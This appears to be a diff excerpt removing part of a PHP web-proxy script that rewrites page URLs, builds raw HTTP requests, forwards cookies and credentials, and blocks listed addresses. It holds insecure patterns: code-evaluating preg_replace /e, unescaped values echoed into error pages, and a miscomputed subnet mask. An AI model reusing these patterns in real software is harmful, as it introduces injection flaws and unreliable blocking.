- "/(<[a-z][^>]*{$g_anyspace} target{$g_anyspace}={$g_anyspace})".
- "(?:_top|(')_top'|(\")_top\")/im",
- '\1\2\3'.COOK_PREF.'_top\2\3')
- :null),
- # deal with <form>s
- array(1,1,
- "/(<form{$html_formnotpost}*?)".
- "(?:{$g_plusspace}action{$g_anyspace}={$g_anyspace}{$html_reg}".
- ")({$html_formnotpost}*)>/im",
- '\1 target="_self"\3><input type="hidden" name="'.
- COOK_PREF.'" class="'.COOK_PREF.'" value=\2'.
- ' />'),
- array(2,1,
- '/<input type="hidden" name="'.COOK_PREF.'" class="'.COOK_PREF.'"'.
- " value{$g_anyspace}={$g_anyspace}{$html_reg} \/>/im",
- 1,false),
- array(1,1,
- '/(<form[^>]*?)>/im',
- '\1 target="_self"'.
- ($OPTIONS['ENCRYPT_URLS']?
- ' onsubmit="return '.COOK_PREF.'.form_encrypt(this);">':'>')),
- array(1,1,
- "/(<form{$html_formnotpost}+)>(?!<!--".COOK_PREF.'-->)/im',
- '\1 target="_parent"><!--'.COOK_PREF.
- '--><input type="hidden" name="" value="_">'),
- # deal with the form button for encrypted URLs
- ($OPTIONS['ENCRYPT_URLS']?array(1,1,
- "/(<input[^>]*? type{$g_anyspace}={$g_anyspace}".
- "(?:\"submit\"|'submit'|submit)[^>]*?[^\/])((?:[ ]?[\/])?>)/im",
- '\1 onclick="'.COOK_PREF.'_form_button=this.name;"\2')
- :null),
- # parse all the other tags
- array(2,1,
- "/<[a-z][^>]*{$g_plusspace}{$hook_html_attrs}{$g_anyspace}=".
- "{$g_anyspace}{$html_reg}/im",
- 2),
- array(2,1,
- "/<param[^>]*{$g_plusspace}name{$g_anyspace}={$g_anyspace}[\"']?".
- "movie[^>]*{$g_plusspace}value{$g_anyspace}={$g_anyspace}".
- "{$html_reg}/im",
- 1),
- array(2,2,
- "/<script[^>]*?{$g_plusspace}src{$g_anyspace}={$g_anyspace}([\"'])".
- "{$g_anyspace}(.*?[^\\\\])\\1[^>]*>{$g_anyspace}<\/script>/im",
- 2),
- ($OPTIONS['URL_FORM'] && PAGE_FRAMED?array(2,1,
- "/<a(?:rea)?{$g_plusspace}[^>]*href{$g_anyspace}={$g_anyspace}".
- "{$html_reg}/im",
- 1,false,NEW_PAGETYPE_FRAME_TOP)
- :null),
- ($OPTIONS['URL_FORM'] && PAGE_FRAMED?array(2,1,
- "/<[i]?frame{$g_plusspace}[^>]*src{$g_anyspace}={$g_anyspace}".
- "{$html_reg}/im",
- 1,false,PAGETYPE_FRAMED_CHILD)
- :null),
- ),
- 'text/css' => array(
- array(2,1,
- "/[^a-z]url\({$g_anyspace}(&(?:quot|#(?:3[49]));|\"|')(.*?[^\\\\])".
- "(\\1){$g_anyspace}\)/im",
- 2),
- array(2,1,
- "/[^a-z]url\({$g_anyspace}((?!&(?:quot|#(?:3[49]));)[^\"'\\\\].*?".
- "[^\\\\]){$g_anyspace}\)/im",
- 1),
- array(2,1,
- "/@import{$g_plusspace}(&(?:quot|#(?:3[49]));|\"|')(.*?[^\\\\])".
- "(\\1);/im",
- 2),
- ),
- 'application/javascript' => $js_regexp_arrays,
- 'application/x-javascript' => $js_regexp_arrays,
- 'text/javascript' => $js_regexp_arrays
- );
- # }}}
- # REGEXPS: STATIC JAVASCRIPT REGEXPS PAGE {{{
- if(QUERY_STRING=='js_regexps' || QUERY_STRING=='js_regexps_framed'){
- static_cache();
- ?>//<script type="text/javascript">
- <?php echo(
- convert_array_to_javascript().
- (
- $OPTIONS['REMOVE_OBJECTS']?
- 'regexp_arrays["text/html"].push(Array(1,/<[\\\\/]?'.
- '(embed|param|object)[^>]*>/ig,""));':
- null
- )
- ); ?>
- //</script><?php exit(); }
- # }}}
- # REGEXPS: SERVER-SIDE ONLY PARSING {{{
- array_push($regexp_arrays['text/html'],
- array(2,1,
- "/<meta[^>]*{$g_plusspace}http-equiv{$g_anyspace}={$g_anyspace}".
- "([\"']|)refresh\\1[^>]* content{$g_anyspace}={$g_anyspace}([\"']|)".
- "[ 0-9\.;\t\\r\n]*url=(.*?)\\2[^>]*>/i",
- 3,true,NEW_PAGETYPE_FRAMED_PAGE),
- array(1,1,
- "/(<meta[^>]*{$g_plusspace}http-equiv{$g_anyspace}={$g_anyspace}".
- "([\"']|)set-cookie\\2[^>]* content{$g_anyspace}={$g_anyspace})([\"'])".
- "(.*?[^\\\\]){$g_anyspace}\\3/i",
- "\\1\\3{$cook_prefix}\\4\\3")
- );
- # }}}
- # REGEXPS: CLEANUP {{{
- # needed later, but $g_anyspace and $html_reg are unset below
- define('BASE_REGEXP',
- "<base[^>]* href{$g_anyspace}={$g_anyspace}{$html_reg}[^>]*>");
- define('END_OF_SCRIPT_TAG',
- "(?:{$g_anyspace}(?:\/\/)?{$g_anyspace}-->{$g_anyspace})?<\/script>");
- define('REGEXP_SCRIPT_ONEVENT',
- "( on[a-z]{3,20}=(?:\"[^\"]+\"|'[^']+'|[^\"' >][^ >]+[^\"' >])|".
- " href=(?:\"{$g_anyspace}javascript:[^\"]+\"|".
- "'{$g_anyspace}javascript:[^']+'|".
- "{$g_anyspace}javascript:[^\"' >][^ >]+[^\"' >]))");
- unset(
- $g_justspace, $g_plusjustspace, $g_anyspace, $g_plusspace, $g_operand,
- $g_n_operand, $g_quoteseg, $g_regseg,
- $hook_html_attrs, $html_frametargets, $hook_js_attrs, $hook_js_getattrs,
- $hook_js_methods, $js_string_methods, $js_string_attrs,
- $js_varsect, $js_jsvarsect, $n_js_varsect, $h_js_exprsect, $js_exprsect,
- $js_expr, $js_expr2, $js_expr3, $js_expr4,
- $l_js_end, $n_l_js_end, $js_begin, $js_end, $js_begin_strict_end,
- $js_begin_strict, $n_js_string, $n_js_set, $n_js_set_left,
- $wrap_js_end_set, $wrap_js_end_get,
- $js_begin_right, $js_xmlhttpreq,
- $h_html_noquot, $html_reg, $js_newobj, $html_formnotpost,
- $js_regexp_arrays
- );
- # }}}
- # }}}
- # PROXY FUNCTIONS {{{
- # PROXY FUNCTIONS: URL PARSING {{{
- function surrogafy_url($url,$topurl=false,$addproxy=true){
- global $curr_urlobj;
- //if(preg_match('/^(["\']).*\1$/is',$url)>0){
- if(
- ($url{0}=='"' && substr($url,-1)=='"') ||
- ($url{0}=='\'' && substr($url,-1)=='\'')
- ){
- $urlquote=$url{0};
- $url=substr($url,1,strlen($url)-2);
- }
- if($topurl===false) $topurl=$curr_urlobj;
- $urlobj=new aurl($url,$topurl);
- $new_url=($addproxy?$urlobj->surrogafy():$urlobj->get_url());
- if(!empty($urlquote)) $new_url="{$urlquote}{$new_url}{$urlquote}";
- return $new_url;
- }
- function framify_url($url,$frame_type=false){
- global $OPTIONS;
- /* if(
- ($frame_type!==PAGETYPE_FRAME_TOP || !$OPTIONS['URL_FORM']) &&
- ($frame_type!==PAGETYPE_FRAMED_PAGE && !PAGE_FRAMED)
- ) return $url;*/
- if($frame_type===PAGETYPE_NULL) return $url;
- //if(preg_match('/^(["\']).*\1$/is',$url)>0){
- if(
- ($url{0}=='"' && substr($url,-1)=='"') ||
- ($url{0}=='\'' && substr($url,-1)=='\'')
- ){
- $urlquote=$url{0};
- $url=substr($url,1,strlen($url)-2);
- }
- if(preg_match(FRAME_LOCK_REGEXP,$url)<=0){
- if($frame_type===PAGETYPE_FRAME_TOP) # && $OPTIONS['URL_FORM'])
- $query='&=';
- elseif($frame_type===PAGETYPE_FRAMED_CHILD) $query='.&=';
- elseif($frame_type===PAGETYPE_FRAMED_PAGE || PAGE_FRAMED) $query='_&=';
- else $query=null;
- $url=preg_replace(
- '/^([^\?]*)[\?]?'.PAGETYPE_MINIREGEXP.'([^#]*?[#]?.*?)$/',
- "\\1?={$query}\\3",$url,1);
- }
- if(!empty($urlquote)) $url="{$urlquote}{$url}{$urlquote}";
- return $url;
- }
- function proxenc($url){
- if($url{0}=='~' || strtolower(substr($url,0,3))=='%7e') return $url;
- $url=urlencode($url);
- $new_url=null;
- for($i=0;$i<strlen($url);$i++){
- $char=ord($url{$i});
- $char+=ord(substr(SESS_PREF,$i%strlen(SESS_PREF),1));
- while($char>126) $char-=94;
- $new_url.=chr($char);
- }
- #return '~'.base64_encode($new_url);
- return '~'.urlencode(base64_encode($new_url));
- }
- # }}}
- # PROXY FUNCTIONS: ERRORS & EXITING {{{
- function finish_noexit(){
- global $dns_cache_array;
- # save DNS Cache before exiting
- $_SESSION['DNS_CACHE_ARRAY']=$dns_cache_array;
- }
- function finish(){
- finish_noexit();
- exit();
- }
- function havok($errorno,$arg1=null,$arg2=null,$arg3=null){
- global $curr_url;
- $url=$curr_url;
- switch($errorno){
- case 1:
- $et='Bad IP Address';
- $ed=
- "The IP address given ({$arg2}) is an impossible IP address, ".
- "or the domain given ({$arg1}) was resolved to an impossible ".
- 'IP address.';
- break;
- case 2:
- $et='Address is Blocked';
- $ed=
- 'The administrator of this proxy service has decided to '.
- "block this address, domain, or subnet.\n<br /><br />\n".
- "Domain: {$arg1}\n<br />\nAddress: {$arg2}";
- break;
- case 3:
- $et='Could Not Resolve Domain';
- $ed=
- "The domain of the URL given ({$arg1}) could not be resolved ".
- 'due to DNS issues or an errorneous domain name.';
- break;
- case 4:
- $et='Bad Filters';
- $ed=
- 'The administrator of this proxy has incorrectly configured '.
- 'his domain filters, or a domain given could not be resolved.';
- break;
- case 5:
- $et='Domain is Blocked';
- $ed=
- 'The administrator of this proxy has decided to block this '.
- 'domain.';
- break;
- case 6:
- $et='Could Not Connect to Server';
- $ed=
- 'An error has occurred while attempting to connect to '.
- "\"{$arg1}\" on port \"{$arg2}\".";
- if($arg2 == 443)
- $ed.=' Perhaps you need to enable SSL in your php.ini file.';
- break;
- case 7:
- $et='Invalid URL';
- $ed='The URL below was detected to be an invalid URL.';
- $url=$arg1;
- break;
- case 8:
- $et='Trying to Access Secure Page Through Insecure Connection';
- $ed=
- 'The site you are trying to access is secured by SSL, however '.
- 'you are accessing this proxy through an insecure connection. '.
- 'Please realize that any information you pass to this site is '.
- 'going to be transmitted on an insecure connection, with the '.
- 'potential of being intercepted.'.
- '<br /><br />'.
- "Domain to unlock: {$arg1}".
- '<br /><br />'.
- 'If you wish to allow secure connections to this domain for '.
- 'this session, press continue below. Otherwise, hit back.'.
- '<br /><br />'.
- '<input type="button" value="Back" style="float: left"'.
- ' onclick="history.go(-1);" />'.
- '<input type="button" value="Continue" style="float: right"'.
- ' onclick="'.
- 'var ifrm=document.createElement(\'iframe\');'.
- 'ifrm.onload=function(){ location.reload(true); };'.
- 'ifrm.src=\''.THIS_SCRIPT.'?'.COOK_PREF.'_ssl_domain='.
- "{$arg1}';".
- 'ifrm.style.height=\'0px\';'.
- 'ifrm.style.width=\'0px\';'.
- 'ifrm.style.border=\'0px\';'.
- 'var body=document.getElementsByTagName(\'body\')[0];'.
- 'body.appendChild(ifrm);'.
- '" />'.
- '<br />';
- break;
- case 9:
- $et='Recursion Error During Parsing';
- $ed=
- 'While trying to parse the page, the proxy encountered a '.
- 'recursion error and had to quit.';
- break;
- }
- $ed.="\n<br /><br />\nURL: {$url}";
- ?>
- <html>
- <head>
- <title>Proxy Error</title>
- </head>
- <body>
- <div style="font-family: bitstream vera sans, trebuchet ms">
- <div style="border: 3px solid #FFFFFF; padding: 2px">
- <div style="
- float: left; border: 1px solid #602020; padding: 1px;
- background-color: #FFFFFF">
- <div style="
- float: left; background-color: #801010; color: #FFFFFF;
- font-weight: bold; font-size: 54px; padding: 2px;
- padding-left: 12px; padding-right: 12px"
- >!</div>
- </div>
- <div style="float: left; width: 500px; padding-left: 20px">
- <div style="
- border-bottom: 1px solid #000000; font-size: 12pt;
- text-align: center; font-weight: bold; padding: 2px"
- >Error: <?php echo($et); ?></div>
- <div style="padding: 6px"><?php echo($ed); ?></div>
- </div>
- </div></div>
- </body>
- </html>
- <?php finish(); }
- # }}}
- # PROXY FUNCTIONS: TCP/IP {{{
- function ipbitter($ipaddr){
- $ipsplit=explode('.',$ipaddr);
- for($i=0;$i<4;$i++){
- $ipsplit[$i]=decbin($ipsplit[$i]);
- $ipsplit[$i]=str_repeat('0',8-strlen($ipsplit[$i])).$ipsplit[$i];
- }
- return implode(null,$ipsplit);
- }
- function ipcompare($iprange,$ip){
- $iprarr=explode('/',$iprange);
- $ipaddr=$iprarr[0];
- $mask=$iprarr[1];
- $maskbits=str_repeat('1',$mask).str_repeat('0',$mask);
- $ipbits=ipbitter($ipaddr);
- $ipbits2=ipbitter($ip);
- return (($ipbits & $maskbits)==($ipbits2 & $maskbits));
- }
- function ip_check($ip,$mask=false){
- $ipseg='(?:[01]?[0-9]{1,2}|2(?:5[0-5]|[0-4][0-9]))';
- return preg_match("/^(?:$ipseg\.){0,3}$ipseg".($mask?'\/[0-9]{1,2}':null).
- '$/i',$ip); #*
- }
- function gethostbyname_cacheit($address){
- global $dns_cache_array;
- $ipaddr=gethostbyname($address);
- $dns_cache_array[$address]=array('time'=>time(), 'ipaddr'=>$ipaddr);
- return $ipaddr;
- }
- function gethostbyname_cached($address){
- global $dns_cache_array;
- if(isset($dns_cache_array[$address]))
- return $dns_cache_array[$address]['ipaddr'];
- return gethostbyname_cacheit($address);
- }
- function get_check($address){
- global $CONFIG;
- if(strrchr($address,'/')) $address=substr(strrchr($address,'/'),1);
- $ipc=ip_check($address);
- $addressip=(ip_check($address)?$address:gethostbyname_cached($address));
- if(!ip_check($addressip)) havok(1,$address,$addressip);
- foreach($CONFIG['BLOCKED_ADDRESSES'] as $badd){
- if(!$ipc)
- if(
- strlen($badd)<=strlen($address) &&
- substr($address,strlen($address)-strlen($badd),
- strlen($badd))==$badd
- ) havok(5);
- if($badd==$addressip) havok(2,$address,$addressip);
- elseif(ip_check($badd,true)){
- if(ipcompare($badd,$addressip)) havok(2,$address,$addressip);
- }
- else{
- $baddip=gethostbyname_cached($badd);
- if(empty($baddip)) havok(4);
- if($baddip==$addressip) havok(2,$address,$addressip);
- }
- }
- return $addressip;
- }
- # }}}
- # PROXY FUNCTIONS: HTTP {{{
- function httpclean($str,$variable=false){
- if($variable)
- return str_replace('"','%22',str_replace(' ','%20',
- preg_replace('/([^"\[\]\-_\.0-9a-zA-Z ])/e',
- '\'%\'.(strlen(dechex(ord(\'\1\')))==1?\'0\':null).'.
- 'strtoupper(dechex(ord(\'\1\')))',
- $str)));
- else
- return str_replace('"','%22',str_replace(' ','%20',
- preg_replace('/([^"\-_\.0-9a-zA-Z ])/e',
- '\'%\'.(strlen(dechex(ord(\'\1\')))==1?\'0\':null).'.
- 'strtoupper(dechex(ord(\'\1\')))',
- $str)));
- }
- function getpage($urlobj){
- global $CONFIG,$OPTIONS,$proxy_variables;
- # Generate HTTP packet content {{{
- $content=null;
- if(isset($_SERVER['CONTENT_TYPE']))
- $content_type = $_SERVER['CONTENT_TYPE'];
- else
- $content_type = 'text/html';
- $is_formdata=substr($content_type,0,19)=='multipart/form-data';
- # Generate for multipart & handle file uploads {{{
- if($is_formdata){
- $strnum=null;
- for($i=0; $i<29; $i++) $strnum.=rand(0,9);
- $boundary="---------------------------{$strnum}";
- # parse POST variables
- while(list($key,$val)=each($_POST)){
- if(!is_array($val)){
- $content.=
- "--{$boundary}\r\n".
- "Content-Disposition: form-data; name=\"{$key}\"\r\n".
- "\r\n{$val}\r\n";
- }
- else{
- while(list($key2,$val2)=each($val)){
- $content.=
- "--{$boundary}\r\n".
- "Content-Disposition: form-data; name=\"{$key}[]\"\r\n".
- "\r\n{$val2}\r\n";
- }
- }
- }
- # parse uploaded files
- while(list($key,$val)=each($_FILES)){
- if(!is_array($val['name'])){
- $fcont=file_get_contents($val['tmp_name']);
- @unlink($val['tmp_name']);
- $content.=
- "--{$boundary}\r\n".
- "Content-Disposition: form-data; name=\"{$key}\"; ".
- "filename=\"{$val['name']}\"\r\n".
- "Content-Type: {$val['type']}\r\n".
- "\r\n{$fcont}\r\n";
- }
- else{
- for($i=0; $i<count($val['name']); $i++){
- $fcont=file_get_contents($val['tmp_name'][$i]);
- @unlink($val['tmp_name'][$i]);
- $content.=
- "--{$boundary}\r\n".
- "Content-Disposition: form-data; name=\"{$key}[]\"; ".
- "filename=\"{$val['name'][$i]}\"\r\n".
- "Content-Type: {$val['type'][$i]}\r\n".
- "\r\n{$fcont}\r\n";
- }
- }
- }
- $content.="--{$boundary}--\r\n";
- }
- # }}}
- # Generate for standard POST {{{
- else{
- $postkeys=array_keys($_POST);
- foreach($postkeys as $postkey){
- if(!in_array($postkey,$proxy_variables)){
- if(!is_array($_POST[$postkey]))
- $content.=
- ($content!=null?'&':null).
- httpclean($postkey,true).'='.
- httpclean($_POST[$postkey]);
- else{
- foreach($_POST[$postkey] as $postkey_key=>$postkey_val){
- if($postkey_key === 0)
- $inner_text='';
- else
- $inner_text=$postkey_key;
- $content.=
- ($content!=null?'&':null).
- httpclean($postkey."[{$inner_text}]",true).'='.
- httpclean($postkey_val);
- }
- }
- }
- }
- // POST variables without values
- $raw_post=file_get_contents('php://input');
- preg_match_all('/(?:^|&)([^&=]+)(?:&|$)/',$raw_post,$matches);
- foreach($matches[1] as $match){
- $content.=($content!=null?'&':null).httpclean($match,true);
- }
- }
- # }}}
- # }}}
- # URL setup {{{
- # don't access SSL sites unless the proxy is being accessed through SSL too
- if(
- $urlobj->get_proto()=='https' && $CONFIG['PROTO']!='https' &&
- (
- !isset($_SESSION['ssl_domains']) ||
- !is_array($_SESSION['ssl_domains']) ||
- (
- isset($_SESSION['ssl_domains']) &&
- is_array($_SESSION['ssl_domains']) &&
- !in_array($urlobj->get_servername(),$_SESSION['ssl_domains'])
- )
- )
- ){
- # ignore certain file types from worrying about this
- $skip = false;
- foreach($CONFIG['SSL_WARNING_IGNORE_FILETYPES'] as $filetype){
- if(substr($urlobj->get_file(), -strlen($filetype)) == $filetype)
- $skip = true;
- }
- if(!$skip) havok(8,$urlobj->get_servername());
- }
- # get request URL
- $query=$urlobj->get_query();
- $requrl=
- $urlobj->get_path().
- $urlobj->get_file().
- (!empty($query)?"?{$query}":null);
- # }}}
- # HTTP Authorization and Cache stuff {{{
- $http_auth=null;
- if(extension_loaded('apache')){
- $fail=false;
- $cheaders=getallheaders();
- $http_auth=$reqarray['Authorization'];
- }
- else $fail=true;
- $authorization=
- ($fail?
- isset($_SERVER['HTTP_AUTHORIZATION']) &&
- $_SERVER['HTTP_AUTHORIZATION']:
- $cheaders['Authorization']);
- $cache_control=
- ($fail?
- isset($_SERVER['HTTP_CACHE_CONTROL']) &&
- $_SERVER['HTTP_CACHE_CONTROL']:
- $cheaders['Cache-Control']);
- $if_modified=
- ($fail?
- isset($_SERVER['HTTP_IF_MODIFIED_SINCE']) &&
- $_SERVER['HTTP_IF_MODIFIED_SINCE']:
- $cheaders['If-Modified-Since']);
- $if_none_match=
- ($fail?
- isset($_SERVER['HTTP_IF_NONE_MATCH']) &&
- $_SERVER['HTTP_IF_NONE_MATCH']:
- $cheaders['If-None-Match']);
- if($fail){
- if(!empty($authorization)) $http_auth=$authorization;
- elseif(
- !empty($_SERVER['PHP_AUTH_USER']) &&
- !empty($_SERVER['PHP_AUTH_PW'])
- ) $http_auth=
- 'Basic '.
- base64_encode(
- "{$_SERVER['PHP_AUTH_USER']}:{$_SERVER['PHP_AUTH_PW']}");
- elseif(!empty($_SERVER['PHP_AUTH_DIGEST']))
- $http_auth="Digest {$_SERVER['PHP_AUTH_DIGEST']}";
- }
- # }}}
- # HTTP packet construction {{{
- # figure out what we are connecting to
- if($OPTIONS['TUNNEL_IP']!=null && $OPTIONS['TUNNEL_PORT']!=null){
- $servername=$OPTIONS['TUNNEL_IP'];
- $ipaddress=get_check($servername);
- $portval=$OPTIONS['TUNNEL_PORT'];
- $requrl=$urlobj->get_url(false);
- }
- else{
- $servername=$urlobj->get_servername();
- $ipaddress=
- (
- $urlobj->get_proto()=='ssl' || $urlobj->get_proto()=='https'?
- 'ssl://':
- null
- ).
- get_check($servername);
- $portval=$urlobj->get_portval();
- }
- # begin packet construction
- $out=
- ($content==null?'GET':'POST').' '.
- str_replace(' ','%20',$requrl)." HTTP/1.1\r\n".
- "Host: ".$urlobj->get_servername().
- (
- ($portval!=80 && (
- $urlobj->get_proto()=='https'?$portval!=443:true
- ))?
- ":$portval":
- null
- )."\r\n";
- # user agent and auth headers
- if($OPTIONS['USER_AGENT']!='-1' && !empty($OPTIONS['USER_AGENT'])){
- $out.="User-Agent: {$OPTIONS['USER_AGENT']}\r\n";
- }
- if(!empty($http_auth)) $out.="Authorization: {$http_auth}\r\n";
- # referer headers
- global $referer;
- if(!$OPTIONS['REMOVE_REFERER'] && !empty($referer))
- $out.='Referer: '.str_replace(' ','+',$referer)."\r\n";
- # POST headers
- if($content!=null)
- $out.=
- 'Content-Length: '.strlen($content)."\r\n".
- 'Content-Type: '.
- (
- $is_formdata?
- "multipart/form-data; boundary={$boundary}":
- 'application/x-www-form-urlencoded'
- )."\r\n";
- # cookie headers
- global $cook_prefix;
- if(!$OPTIONS['REMOVE_COOKIES'] && count($_COOKIE)>0){
- $addtoout=null;
- reset($_COOKIE);
- while(list($key,$val)=each($_COOKIE)){
- if(
- $key{0}!='~' && strtolower(substr($key,0,3))!='%7e' &&
- str_replace(COOKIE_SEPARATOR,'',$key)==$key
- ) continue;
- if($OPTIONS['ENCRYPT_COOKIES']){
- $key=proxdec($key);
- $val=proxdec($val);
- }
- $cook_domain=
- substr($key,0,strpos($key,COOKIE_SEPARATOR)).COOKIE_SEPARATOR;
- if(
- substr($cook_prefix,strlen($cook_prefix)-strlen($cook_domain),
- strlen($cook_domain))!=$cook_domain
- ) continue;
- $key=
- substr($key,strlen($cook_domain),
- strlen($key)-strlen($cook_domain));
- if(!in_array($key,$proxy_variables)) $addtoout.=" $key=$val;";
- }
- if(!empty($addtoout)){
- $addtoout.="\r\n";
- $out.="Cookie:{$addtoout}";
- }
- }
- # final packet headers and content
- $out.=
- "Accept: */*;q=0.1\r\n".
- ($CONFIG['GZIP_PROXY_SERVER']?"Accept-Encoding: gzip,deflate\r\n":null).
- //"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n".
- //"Accept-Language: en-us,en:q=0.5\r\n".
- /*/
- "Keep-Alive: 300\r\n".
- "Connection: keep-alive\r\n". /*/
- "Connection: close\r\n". //*/
- ($cache_control!=null?"Cache-Control: {$cache_control}\r\n":null).
- ($if_modified!=null?"If-Modified-Since: {$if_modified}\r\n":null).
- ($if_none_match!=null?"If-None-Match: {$if_none_match}\r\n":null).
- "\r\n{$content}";
- # }}}
- # Ignore SSL errors {{{
- # This part ignores any "SSL: fatal protocol error" errors, and makes sure
- # other errors are still triggered correctly
- function errorHandle($errno,$errmsg){
- if(
- $errno<=E_PARSE && (
- $errno!=E_WARNING ||
- substr($errmsg,-25)!='SSL: fatal protocol error'
- )
- ){
- restore_error_handler();
- trigger_error($errmsg,$errno<<8);
- set_error_handler('errorHandle');
- }
- }
- set_error_handler('errorHandle');
- # }}}
- # Send HTTP Packet {{{
- if(!$CONFIG['PERSISTENT_CONNECTIONS']){
- $fp=@fsockopen($ipaddress,$portval,$errno,$errval,5)
- or havok(6,$servername,$portval);
- stream_set_timeout($fp,5);
- } else {
- $fp=@pfsockopen($ipaddress,$portval,$errno,$errval,5)
- or havok(6,$servername,$portval);
- stream_set_timeout($fp,$CONFIG['PERSISTENT_CONNECTIONS_TIMEOUT']);
- # for persistent connections, this may be necessary
- /*
- $ub=stream_get_meta_data($fp);
- $ub=$ub['unread_bytes'];
- if($ub>0) fread($fp,$ub);
- */
- }
- fwrite($fp,$out);
- # }}}
- # Retrieve and Parse response headers {{{
- $response='100';
- while($response=='100'){
- $responseline=fgets($fp,8192);
- $response=substr($responseline,9,3);
- global $headers;
- $headers=array();
- while($curline!="\r\n" && $curline=fgets($fp,8192)){
- $harr=explode(':',$curline,2);
- $headers[strtolower($harr[0])][]=trim($harr[1]);
- }
- }
- //if($headers['pragma'][0]==null) header('Pragma: public');
- //if($headers['cache-control'][0]==null) header('Cache-Control: public');
- //if($headers['last-modified'][0]==null && $headers['expires']==null)
- // header('Expires: '.date('D, d M Y H:i:s e',time()+86400));
- # read and store cookies
- if(!$OPTIONS['REMOVE_COOKIES']){
- global $cook_prefdomain;
- for($i=0;$i<count($headers['set-cookie']);$i++){
- $thiscook=explode('=',$headers['set-cookie'][$i],2);
- if(!strpos($thiscook[1],';')) $thiscook[1].=';';
- $cook_val=substr($thiscook[1],0,strpos($thiscook[1],';'));
- $cook_domain=
- preg_replace('/^.*domain=[ ]*\.?([^;]+).*?$/i','\1',
- $thiscook[1]); #*
- if($cook_domain==$thiscook[1]) $cook_domain=$cook_prefdomain;
- elseif(
- substr($cook_prefdomain,
- strlen($cook_prefdomain)-strlen($cook_domain),
- strlen($cook_domain))!=$cook_domain
- ) continue;
- $cook_name=
- str_replace('.','_',$cook_domain).COOKIE_SEPARATOR.$thiscook[0];
- if($OPTIONS['ENCRYPT_COOKIES']){
- $cook_name=proxenc($cook_name);
- $cook_val=proxenc($cook_val);
- }
- dosetcookie($cook_name,$cook_val);
- }
- }
- # page redirected, send it back to the user
- if($response{0}=='3' && $response{1}=='0' && $response{2}!='4'){
- $redirurl=framify_url(
- surrogafy_url($headers['location'][0],$urlobj),
- NEW_PAGETYPE_FRAMED_PAGE
- );
- fclose($fp);
- restore_error_handler();
- finish_noexit();
- header("Location: {$redirurl}");
- exit();
- }
- # parse the rest of the headers
- $oheaders=$headers;
- $oheaders['location']=$oheaders['content-length']=
- $oheaders['content-encoding']=$oheaders['set-cookie']=
- $oheaders['transfer-encoding']=$oheaders['connection']=
- $oheaders['keep-alive']=$oheaders['pragma']=$oheaders['cache-control']=
- $oheaders['expires']=null;
- while(list($key,$val)=each($oheaders))
- if(!empty($val[0])) header("{$key}: {$val[0]}");
- unset($oheaders);
- header("Status: {$response}");
- # }}}
- # Retrieve content {{{
- if(
- substr($headers['content-type'][0],0,4)=='text' ||
- substr($headers['content-type'][0],0,22)=='application/javascript' ||
- substr($headers['content-type'][0],0,24)=='application/x-javascript'
- ){
- $justoutput=false;
- $justoutputnow=false;
- }
- else{
- $justoutputnow=($headers['content-encoding'][0]=='gzip'?false:true);
- $justoutput=true;
- }
- # Transfer-Encoding: chunked
- if($headers['transfer-encoding'][0]=='chunked'){
- $body=null;
- $chunksize=null;
- while($chunksize!==0){
- $chunksize=intval(fgets($fp,8192),16);
- $bufsize=$chunksize;
- while($bufsize>=1){
- $chunk=fread($fp,$bufsize);
- if($justoutputnow) echo $chunk;
- else $body.=$chunk;
- $bufsize-=strlen($chunk);
- }
- fread($fp,2);
- }
- }
- # Content-Length stuff - commented for even more chocolatey goodness
- # Some servers really botch this up it seems...
- /*elseif($headers['content-length'][0]!=null){
- $conlen=$headers['content-length'][0];
- $body=null;
- for($i=0;$i<$conlen;$i+=$read){
- $read=($conlen-$i<8192?$conlen-$i:8192);
- $byte=fread($fp,$read);
- if($justoutputnow) echo $byte;
- else $body.=$byte;
- }
- }*/
- # Generic stream getter
- else{
- if(function_exists('stream_get_contents')){
- if($justoutputnow) echo stream_get_contents($fp);
- else $body=stream_get_contents($fp);
- }
- else{
- $body=null;
- while(true){
- $chunk=fread($fp,8192);
- if(empty($chunk)) break;
- if($justoutputnow) echo $chunk;
- else $body.=$chunk;
- }
- }
- }
- fclose($fp);
- restore_error_handler();
- # }}}
- # GZIP, output, and return {{{
- if(
- isset($headers['content-encoding'][0]) &&
- $headers['content-encoding'][0]=='gzip'
- ){
- # http://us2.php.net/manual/en/function.gzdecode.php
- $temp=tempnam('/tmp','ff');
- @file_put_contents($temp,$body);
- ob_start();
- readgzfile($temp);
- $body=ob_get_clean();
- unlink($temp);
- }
- if($justoutput){
- if(!$justoutputnow) echo $body;
- finish();
- }
- return $body;
- # }}}
- }
- # }}}
- # }}}
- # PROXY EXECUTION {{{
- # PROXY_EXECUTION: REDIRECT IF FORM INPUT {{{
- if(IS_FORM_INPUT){
- $theurl=framify_url(surrogafy_url(ORIG_URL,null),PAGETYPE_FRAME_TOP);
- header("Location: {$theurl}");
- finish();
- }
- # }}}
- # PROXY EXECUTION: REFERER {{{
- global $referer;
- if(
- isset($_SERVER['HTTP_REFERER']) &&
- $_SERVER['HTTP_REFERER']!=null &&
- !$OPTIONS['REMOVE_REFERER']
- ){
- $refurlobj=new aurl($_SERVER['HTTP_REFERER'], null, true);
- $referer=proxdec(preg_replace(
- '/^=(?:\&=|_\&=|\.\&=)?([^\&]*)[\s\S]*$/i','\1',
- $refurlobj->get_query()
- ));
- }
- else $referer=null;
- #$getkeys=array_keys($_GET);
- #foreach($getkeys as $getvar){
- # if(!in_array($getvar,$proxy_variables)){
- # $curr_url.=
- # (strpos($curr_url,'?')===false?'?':'&').
- # "$getvar=".urlencode($_GET[$getvar]);
- # }
- #}
- # }}}
- # PROXY EXECUTION: DNS CACHE {{{
- if(!isset($_SESSION['DNS_CACHE_ARRAY'])) $dns_cache_array=array();
- else $dns_cache_array=$_SESSION['DNS_CACHE_ARRAY'];
- # purge old records from DNS cache
- while(list($key,$entry)=each($dns_cache_array)){
- if($entry['time']<time()-($CONFIG['DNS_CACHE_EXPIRE']*60))
- unset($dns_cache_array[$key]);
- }
- # }}}
- # PROXY EXECUTION: PAGE RETRIEVAL {{{
- global $headers;
- $body=getpage($curr_urlobj);
- $tbody=trim($body);
- if( // AJAX
- strlen($tbody) > 0 &&
- (
- ($tbody{0}=='"' && substr($tbody,-1)=='"') ||
- ($tbody{0}=='\'' && substr($tbody,-1)=='\'')
- )
- ){
- echo $body;
- finish();
- }
- unset($tbody);
- define('CONTENT_TYPE',
- preg_replace('/^([a-z0-9\-\/]+).*$/i','\1',$headers['content-type'][0])); #*
- # }}}
